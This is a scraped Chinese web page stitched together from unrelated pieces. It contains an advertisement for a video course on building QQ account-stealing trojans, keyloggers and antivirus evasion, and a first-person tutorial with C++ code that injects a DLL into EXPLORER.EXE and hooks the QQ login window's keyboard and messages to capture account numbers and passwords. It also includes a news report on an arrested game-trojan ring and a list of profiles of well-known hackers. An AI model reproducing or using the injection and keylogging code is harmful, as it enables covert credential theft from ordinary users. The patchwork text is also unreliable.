盗号软件下载免费编程

牧马人易语言制作QQ盗号木马免杀视频教程
视频选集(完整请下载)
牧马人易语言制作QQ盗号木马免杀视频教程即牧马人易语言***教程(让你成为易语言高手)让大家学会使用易语言开发盗号木马,免杀程序。
牧马人易语言10之制作键盘记录器第一课
牧马人易语言11之制作键盘记录器第二课
牧马人易语言12之制作键盘记录器第三课
牧马人易语言13之制作键盘记录器第四课
牧马人易语言14之制作QQ轰炸机
牧马人易语言15之制作QQ空间强行查看器
牧马人易语言16之QQ易语言之制作窗口抖动
牧马人易语言17之QQ易语言教程之制作盗号器
牧马人易语言18之免杀
牧马人易语言19之最新3种免杀方法
牧马人易语言20之盗号之制作木马生成器
牧马人易语言6之文件的捆绑
牧马人易语言7之制作诱惑软件网赚
牧马人易语言8之判断是否中木马或后门
牧马人易语言9之制作QQ登陆器
牧马人易语言⑤之认识常用命令
牧马人易语言第一课
牧马人易语言第三课
牧马人易语言第二课
牧马人易语言第四课
下载地址列表 - 磐实编程网 解压密码: 上传我的文档
 下载
 收藏
该文档贡献者很忙,什么也没留下。
 下载此文档
正在努力加载中...
编写盗号和盗密码软件知识
下载积分:900
内容提示:编写盗号和盗密码软件知识
文档格式:DOC|
浏览次数:18|
上传日期: 05:54:18|
文档星级:
该用户还上传了这些文档
编写盗号和盗密码软件知识
官方公共微信&&&&易语言盗号软件
易语言盗号软件
易语言 qq密码破解
易语言 编程
仅供学习使用
若举报审核通过,可奖励20下载分
被举报人:
举报的资源分:
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动***等内容
含广告内容
版权问题,侵犯个人或公司的版权
*详细原因:
VIP下载&&免积分60元/年(1200次)
您可能还需要
开发技术下载排行酷勤网 – 程序员的那点事!
当前位置: >
浏览次数:次
经常有听到有朋友QQ被盗的消息,总感觉做出这种行为的人是可鄙的,不就是对QQ窗口进行监视,然后再是记录用户输入的号码和密码,认为没什么了不起。
对于Windows核心编程,本人还是一只菜鸟,前一段时间把《Windows系统编程》粗略的看一边(当然重点地方仔细的看),由于对于C++有点基础,感觉学起来比较容易上手。但到了这两天真正实践的时候,遇到了各种各样的问题。即使一个小小的问题都足以让我这只菜鸟郁闷老半天。直到此时,在完成这个软件的时候,整理一下思路,不但算是给自己个总结,也跟像我一样的菜鸟们分享一下自己的经验。
想必大家都已经知道,这类软件的特点就是在用户不知不觉的时候工作。在任务管理器中是看不到它们的,这就是隐藏了进程。采用插入内核的嵌入方式、利用远程插入线程技术、嵌入DLL线程、或挂接PSAPI等都可以达到效果,哎,既然是个菜鸟就选择一个最简单的来做个实验。
先讲一下思路:需要三个进程A,B,C;两个DLL。
初始进程A,用于在进程B中创建远程线程,创建成功立即退出,不会留给任务管理器任何捕捉它的机会(你根本来不及观察)。
进程B作为远程线程的寄主,选择的时候应该是那些系统中必须执行的进程,比如EXPLORER.EXE。其中的远程线程用于监视目标进程。
进程C为目标进程在这里也就是QQ.EXE。
第一个DLL(InspectQQLandDlg.dll),远程线程的载体。
第二个DLL(MyHook.dll),全局钩子函数的载体。
现在要做是利用进程A把InspectQQLandDlg.dll映射到进程B,同时启动该DLL中的远程线程,再利用该线程监视目标进程(QQ.EXE)QQ登陆窗口,一旦找到,立即把MyHook.dll映射到目标进程来监视用户的输入。
这样也清楚了这个软件设计的总体构架,下面用代码来具体实现。
1。远程线程的创建。先利用进程快照取得目标进程,相对比较简单
hSnapshot = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 ) ;
if ( hSnapshot == INVALID_HANDLE_VALUE)
string lpName = &EXPLORER.EXE& ;
PROCESSE***Y32
pe.dwSize = sizeof ( PROCESSE***Y32 );
for( BOOL fOk = Process32First ( hSnapshot, &pe ) ; fOk; fOk =
Process32Next( hSnapshot, &pe ) )
if ( pe.szExeFile == lpName )
HANDLE hRemoteProcess = OpenProcess ( PROCESS_ALL_ACCESS,
false, pe.th32ProcessID ) ;
char szInspectDllPath[128] ;
GetCurrentDirectory ( 128, szInspectDllPath ) ;
strcat ( szInspectDllPath, &QQLandDlg.dll&&\\debug\\InspectQQLandDlg.dll& ) ;
LPVOID pszInspectDllR
int InspectDllNameLength = sizeof ( szInspectDllPath ) + 1 ;
pszInspectDllRemote = VirtualAllocEx ( hRemoteProcess,
NULL, InspectDllNameLength, MEM_COMMIT, PAGE_READWRITE ) ;
WriteProcessMemory ( hRemoteProcess, pszInspectDllRemote,
(LPVOID)szInspectDllPath, InspectDllNameLength, NULL);
HMODULE hM
hModule = GetModuleHandle ( &kernel32.DLL& ) ;
LPTHREAD_START_ROUTINE fnStartA
fnStartAddr = ( LPTHREAD_START_ROUTINE ) GetProcAddress ( hModule,
&LoadLibraryA& ) ;
HANDLE hInspectRemoteThread = NULL ;
hInspectRemoteThread = CreateRemoteThread ( hRemoteProcess, NULL, 0,
fnStartAddr, pszInspectDllRemote, 0, NULL ) ;
if( hSnapshot != NULL )
CloseHandle ( hSnapshot ) ;
CloseHandle ( hRemoteProcess ) ;
2。此时InspectQQLandDlg.DLL已经被映射到EXPLORER.EXE。此时在InspectQQLandDlg.DLL的 DllMain(千万不要写成DLLMain)接受到DLL_PROCESS_ATTACH消息,但一般来说不因在DllMain中执行过多的功能(借鉴前人的经验,嘿嘿),于是很容易想到开辟一个新线程。
switch(fdwReason)
case DLL_PROCESS_ATTACH:
MessageBox ( 0, &Code Injection success!&, &NOTE&, MB_OK ) ;
HANDLE hNewThread = CreateThread ( NULL, 0,ThreadForInspect, NULL, 0, 0 ) ;
在新线程中要达到的目标只是一个循环,利用while()和循环标志(BOOL)isContinue即可以实现。
在这个远程线程中要完成的第二个任务是找到QQ登陆对话框中关键控件。
关于这点网上有很多资料,利用的是FindWindow和FindWindowEx,这是针对以前的版本。在这里已经无效了,现在QQ在这里下了点工夫,采用的是窗口标题采用随机字符。
就以登陆对话框为例,对话框的类为耂&,或许许多菜鸟朋友会像我在最初的时候一样,傻傻用FindWindow (&QQ用户登陆&,耂&) ;结果什么都没有,哎~~
其实可以通过窗口枚举搞清楚QQ在这里到底做了什么手脚。
BOOL CALLBACK EnumWindowProc ( HWND hwnd, LPARAM lParam )
if ( !hwnd )
return false ;
char szWindowName[128] ;
ZeroMemory ( szWindowName, 128 ) ;
GetClassName ( hwnd, szWindowClassName, 128 ) ;
if ( !strcmp ( szWindowClassName, 耂& ) )
__asm int 3
return true ;
利用上面的程序段,在VC调试器中不断按F5且同时在WATCH中观察szWindowName,很容易发现这个窗口名字符串是由不超过二十个字符组成(多次观察),但其中的元素只有0X13,0X10,0X32,字符串中的每个位置都是三个元素之一。但在SPY++中窗口名中看起来只不过是& &,怎么看都只是几个空格(再提醒一下,不要试图通过复制其中的内容,效果可是无法忍受的,呵呵)
事实上登陆窗口可以通过窗口的许多确定因素来确定,比如窗口风格,窗口ID之类的,这些都可以通过SPY++轻易得到(SPY++,好东西啊),下面也就不多发话了,直接给出各个关键控件的代码。
#define UserNameComboBoxId 0x0000008A //用户名控件ID
#define PasswordEditId 0x //密码控件ID
#define ButtonId 0x00003EA0 //登陆按扭控件ID
#define QQLandDlgMiniStyle 0x94CA00C4 //登陆对话框最小化时的风格
#define QQLandDlgShowStyle 0XB4CA00C4 //登陆对话框在桌面显示时的风格
BOOL CALLBACK EnumWindowProc ( HWND hwnd, LPARAM lParam )
if ( !hwnd )
return false ;
long style = GetWindowLong ( hwnd, GWL_STYLE ) ;
if ( style == QQLandDlgMiniStyle || style == QQLandDlgShowStyle )
EnumChildWindows ( hQQLand, EnumChildWndProc, NULL ) ;
return false ;
return true ;
BOOL CALLBACK EnumChildWndProc ( HWND hwnd, LPARAM lParam )
if ( !hwnd )
return false ;
long id= GetWindowLong ( hwnd, GWL_ID ) ;
if (id == UserNameComboBoxId )
hUserName =
else if ( id == PasswordEditId )
hPassword =
else if ( id == ButtonId )
hLandButton =
return true ;
到这里终于取得盼望多时的hUserName,hPassword,hButton这三个控件的句柄。~v~
在这里其实可以用
SendMessage ( hUserName, WM_GETTEXT, 128, (LPARAM)szUserName );
取得UserName(QQ号码),但不能取得密码。
可以随便下载个*号密码,再在密码框中输入几个字符,结果可能是失败,不知道QQ做了什么手脚,有机会再好好研究。既然此路不通,菜鸟也自己的办法去达到目标。
现在远程线程的第二个功能(取得关键控件的句柄)已经完成,接下来要做的事是把MyHook.dll映射到QQ.EXE,这样即可实现对用户键盘输入的监视。
只需调用MyHook.dll的接口函数即可
SetHook ( hQQLand, hUserName, hPassword, hLandButton, true ) ;
3。MyHook.dll模块。
EXPORT BOOL WINAPI SetHook ( HWND hQQLand,
HWND hUserName, HWND hPassword, HWND hLandButton, BOOL isInstall )
if ( isInstall )
hQQLandDlg = hQQL
hUserNameEdit = hUserN
hPasswordComboBox = hP
hButton = hLandB
DWORD dwQQLandDlgThreadId = GetWindowThreadProcessId ( hQQLand, NULL ) ;
hHookDll = GetModuleHandle ( &MyHook& ) ;
hKeyboard = SetWindowsHookEx ( WH_KEYBOARD,
(HOOKPROC)KeyboardProc, hHookDll, dwQQLandDlgThreadId ) ;
hWndProc = SetWindowsHookEx ( WH_CALLWNDPROC,
(HOOKPROC)CallWndProc, hHookDll, dwQQLandDlgThreadId ) ;
if ( hKeyboard != NULL && hWndProc != NULL )
return true ;
UnhookWindowsHookEx ( hKeyboard ) ;
UnhookWindowsHookEx ( hWndProc ) ;
hHookDll = NULL ;
hKeyboard = NULL ;
hWndProc = NULL ;
ZeroMemory ( szPassword, 128 ) ;
pszPasswordLen = 0 ;
return false ;
这个程序段很简单只是通过检测远程线程的输入***、卸载钩子函数。
如果对钩子函数不清楚的朋友,看一下MSDN或者WIN32函数集就可以了。
这里对QQ登陆对话框线程设置两个钩子,一个键盘钩子函数记录键盘输入;另一个全局消息钩子。
LRESULT CALLBACK KeyboardProc ( int nCode, WPARAM wParam, LPARAM lParam )
if ( wParam == VK_RETURN && lParam & 0 )
SendMessage ( hUserNameEdit, WM_GETTEXT, 128, (LPARAM)szUserName );
if ( lParam & 0 && wParam != VK_RETURN )
char KeyName[10] ;
ZeroMemory ( KeyName, 10 ) ;
GetKeyNameText ( lParam, KeyName, 10 ) ;
if ( strlen ( KeyName ) == 1 )
strcat ( szPassword, KeyName ) ;
return CallNextHookEx ( hKeyboard, nCode, wParam, lParam ) ;
也由一部分用户是用鼠标点击登陆按扭的,可由下面代码实现
LRESULT CALLBACK CallWndProc ( int nCode, WPARAM wParam, LPARAM lParam )
CWPSTRUCT *p = (CWPSTRUCT*)lP
if ( p-&message == WM_COMMAND && p-&hwnd == hButton )
SendMessage ( hUserNameEdit, WM_GETTEXT, 128, (LPARAM)szUserName );
return CallNextHookEx ( hWndProc, nCode, wParam, lParam ) ;
上面给出的几段代码可以实现基本的号码和密码记录功能,但对于具体细节的处理(比如用户按退格键或是其他),这些只要考虑仔细就可以了没有什么难度,这里就不说了
& 相关主题:
本文来源:):国内黑客第5大高手编写盗号木马被抓
&&&&& 计算机程序员关雷(化名)号称国内黑客第5大高手,有着一份外人羡慕的高薪工作。可他居然鬼使神差地答应了“朋友”的邀请,编写并发布盗号木马,供盗号团伙盗取“传奇世界”、“冒险岛”、“永恒之塔”等游戏里玩家的账号密码,他则从中收取维护升级木马的劳务费。南京几个玩家失窃后向警方报了案,经侦查,公安网监部门抓获了关雷、孙立光,以及购买木马并实施盗号的李骏等8个下家。将这个网络犯罪团伙,从木马程序作者到批发商,再到盗号实施者以及挂网流量商来了个“一锅端”。
  他俩是上线
  黑客高手应邀改装木马
  1980年出生的关雷大学读的是数学专业,由于爱好计算机成了一名高手,就职于北京一家计算机信息公司任程序员,号称国内黑客第5大高手,他的网名“帝国大叔”和QQ号长期位列国内网络顶级黑客排行榜。记者搜索了该排行榜,果然发现与关雷资料吻合的人,属于顶级黑客之一。2008年年底,有个叫“远洋”的网友慕名加了关雷的QQ,“远洋”和关雷聊天说自己有个网站,老是被人攻击,想请关雷帮忙做安全维护,他每个月付给关雷一两千元维护费。关雷当时就上了“远洋”提供的网站地址,发现已经被人攻击了,身为高手的他很快找到了漏洞并给补上,随后,“远洋”信守诺言地将1000元钱打给关雷。从那以后,“远洋”的网站一旦遭到攻击,他就找关雷给维护,并打款将费用付给关雷。
  2009年八九月间,这两个网友的关系处得比较熟络了。一天,“远洋”和关雷在QQ上聊天,说起做游戏的盗号木马很赚钱,并从网上发给关雷一个木马,让他破解看看。
  这个技术对关雷来说还不是小菜一碟,他很快破解了。关雷通过脱壳、免杀、再加壳等程序,做成一个改良版的木马生成器。一切搞定后,关雷将改好的木马发给“远洋”,“远洋”测试后回复“可以使用”,但这个木马没有卖出去,因此就不付钱给关雷了。过了几天,“远洋”又给关雷发来一个“新奇迹世界”游戏的盗号木马,关雷如法炮制地破解、修改后回传,这一次“远洋”反馈说卖掉了,很快给关雷的卡上汇去5000元钱。
  闭着眼睛挣了20多万“闲钱”
  关雷交代,他后来又给“远洋”做过“魔兽世界”、“冒险岛”、“永恒之塔”等游戏木马,他给自己的木马加壳,一来逃避杀毒软件的查杀,二来可减少木马的占用空间,三来通过给木马加密,也要防止别人偷他的木马。“远洋”收到木马后在网络批发出卖,因为网络游戏会不时地更新,因此木马也需要更新修改,这更新维护的活也只有关雷能干,有时“远洋”还给他发来新的木马样本,由关雷负责破解。游戏木马提供给“远洋”后,关雷每隔一两个星期就要更新维护一次,“远洋”按月给他的银行卡打钱,开始的几个月每个月支付几千元,随着工作量的加大,后来每个月的报酬达到一两万元。2010年9月,“远洋”付给关雷的钱越来越少,说是木马不好卖,关雷就不想再做了,接下来的两个月里,“远洋”不断地催促他继续做维护,关雷给他做了“冒险岛”、“永恒之塔”、“龙之谷”三个木马的免杀,收到“远洋”的10000元钱后,就再也看不到对方上线了,关雷心里也犯嘀咕,心想“远洋”怕是给抓起来了。其实,关雷帮“远洋”做事一直有担忧,两人紧密联系了一段时间后,他觉得自己的QQ号用得太多了,感觉早晚要出事,于是换了个QQ号与“远洋”联系。
  “远洋”前后共给关雷汇了二十多万元,关雷的程序员工作收入本就不菲,生活中他并不缺钱,这些钱打到卡上后他也一直没用过。
  关雷知道这些木马可以将游戏的密码、账号、游戏里的角色、二级密码、游戏金币等参数一起发送到指定的地址,而且根据“远洋”的要求,他在“冒险岛”和“永恒之塔”两款游戏里给“远洋”留过后门,通过后门,“远洋”可以轻松截取游戏中各个玩家的游戏信息,盗号更是小菜一碟,但他并没有去追问“远洋”购买这些木马程序的目的,而是选择“睁一只眼闭一只眼”,帮助“远洋”更新和维护木马程序。
  这样的合作直到今年1月,南京接连有三个玩家发现游戏装备被盗,有个玩家连游戏密码都被人改掉了,三人先后向警方报了案。南京警方网监部门经侦查,于1月11日在北京将关雷抓获。
  木马批发商获利买辆车
  “远洋”的真名叫孙立光,沈阳人,他有个网站做外挂下载,因为时常被人攻击所以慕名找到关雷。这期间看到别人卖木马赚了钱,并且听说木马盗号一个月能挣10万元,加之网上有人联系他买木马,怎奈自己没这个技术,于是请关雷来写木马程序,先后让关雷给他写了“奇迹世界”等六款木马程序。孙立光转手在网上的QQ群里叫卖,先后把木马批发卖给了网名叫“90后”的网友。由于网络游戏会定期升级,孙立光卖出的木马也需要定期做相应的修改,于是孙立光和“90后”谈好每个月要收取维护费,其中“奇迹世界”每个月费用为五六千元,“冒险岛”是每个月元,“永恒之塔”头一个月是15000元,之后每个月略有减少。孙立光每个月通过网络和“90后”结算后,按10%-20%给关雷提成,孙立光给关雷的木马做独家代理,充当二道贩子短短几个月就获利7.5万元,他潇洒地买了辆中华轿车开起来。
  他们是下家
  买马者设工作室“洗信”盗号
  孙立光的下家“90后”是远在广西柳州的李骏。早在2008年,李骏的同学胡军在玩“奇迹世界”游戏时认识一个玩家,对方告诉他通过“洗信”可以赚钱,还能获得好的装备,当时对方发给他“奇迹世界”的10个账号和密码,胡军付给玩家30元,他把买来账号上的装备转移到自己的账号上,对比了一下如果花钱买要花100多元,于是动心想做“洗信”的***,和同学李骏商量后一拍即合。
  2009年夏天,李骏出资购买了电脑,聘请胡军等人成立了一个“洗信工作室”,所谓的“洗信”就是盗取游戏玩家的账户和密码。李骏负责在网上联系卖木马的,和卖家熟悉后就交给同学胡军保持联系,胡军同时负责“洗信”。生意好的时候,洗信工作室每个月能挣2万元,李骏按工作室利润的两成分给胡军,对于其他雇来的洗信操作人员,则根据工作量每月发给他们元工资。从“洗信工作室”成立到案发被抓,李骏和胡军共获利15万元左右,他俩的同学王长竹得知后也想搞这一行,于是向李骏讨教,李骏把他们已经洗过的“二手信”发给他,让刚入门的王长竹先熟悉熟悉。
  日早上,南京玩家小强上网时惊奇地发现,自己在“奇迹世界”游戏61区的游戏装备被偷了,装备市值2000元左右,这些装备有的是他在游戏里购买的,有的是在游戏里自己制作的,花的都是游戏币,而游戏币是他先后花了1万多元人民币充值后换取的。小强开始不清楚账号是如何被盗的,后来他上网查询了一番,得知是中了一种木马,于是到公安机关报了案。南京警方先后接到数位游戏玩家的类似报案,网监部门立案后展开侦查,先后将李骏、胡军、孙立光和关雷等人抓获。
  合作伙伴开“后门”吃里扒外
  李骏落网后交代,他们通过流量商在网上挂木马,游戏玩家一旦浏览了流量商挂木马的网站,就会自动下载木马,木马就会把玩家输入的账号和密码以及游戏种类、玩家身份等信息(即盗号者所称的“信”)发到指定的网页里。李骏通过胡军及其他雇员操作,获取账号和密码进入这款游戏,找到这个玩家的身份名,随即进入玩家的角色,将玩家的装备洗出来拿到网上交易,由于别的玩家都不愿以现金直接交易,他们就将装备换成游戏币后再交易换成现金。
  李骏只负责出资,“洗信工作室”的具体事务都交给胡军去做,他只是每天登录木马作者制作的网页,通过网页查看收到的信掌握流量。这个网页行话叫“箱子”,他将“箱子”的地址发给胡军和其他工作室成员,由他们直接登录,按照各自分工的区域来洗信。李骏开始并不太懂“箱子”的奥秘,到后来他渐渐感到洗出来的“信”越来越少,经过一番调查这才发现胡军背着自己留了个后门,把洗出的信截留10%悄悄卖给王长竹,先后卖出七八百封信获利两三千元。原来,王长竹发现李骏发给自己的都是洗过的“二手信”,转而找到胡军求购,李骏、胡军及洗信工作室其他成员落网后,王长竹也一并被抓获归案,本案中同时落网的,还有为洗信工作室挂网出售流量的成都人伍山。伍山交代,他在网上接受广西网友“90后”委托将木马挂网,对方盗得一个游戏账号付他4元钱。伍山通过朋友买到某网站的权限后,将“90后”交给他的木马挂了上去,短短一天半时间就进了50多封信,拿到“90”后汇来的200多元后,他觉得这活计轻松又赚钱,便专心干起这个***,四五个月便赚了1.2万余元。(文中人物、网名均为化名)
  通讯员&孟军&孙长庆
  本报记者&魏晓昕
  中国顶级黑客网络资料(2010版)
  sunwear
  日娃哥。EST核心成员。圈内皆知他手握很多未公开漏洞。渗透入侵和漏洞方面的高手,曾是编程内核牛人。曾经入侵过世界顶级黑客组织Metasploit,剑桥大学等众多高端机构。几年前的世界最顶级两大黑客大会defcon和blackhat都对他有过报道。
  刺哥,大风哥。身材瘦弱。是中国黑客圈内纯技术黑客组织幻影旅团创始人。中国顶级黑客之一。目前好像就职于淘宝公司网络安全部门。也是手握很多未公开漏洞的人。很多影响力很大的0day都是出自幻影旅团。WebZine的发起人。并且发展过WIKI的系统。还曾远赴美国参加世界顶级黑客大会blackhat。
  国内顶级地下黑客组织0x557核心成员。是漏洞挖掘、利用方面的高手。不用说,手里的漏洞也是多的可以批发了。目前就职于世界著名反病毒杀毒软件公司麦咖啡(刚刚被intel收购)。现在还写起了iphone,ipad下的安全软件。看来是个全能选手。
  tombkeeper
  于某。传说中的tk教主。国内著名黑客组织安全焦点核心成员。就职于绿盟科技,俗称妇科圣手。对windows操作系统以及漏洞等方面的研究可以说是非常精通。而在安全焦点论坛,最近几年一直被人奉为TK教主。对于其他领域的科学也有着独到的见解。文笔思想也是很独特的。
  安全焦点核心成员之一。目前就职于北京一家公司。曾经写过很多漏洞溢出方面的分析利用文章(WEBD***,IDQ,IDA等)。exploit也写过很多。现在较为低调。

参考资料

 

随机推荐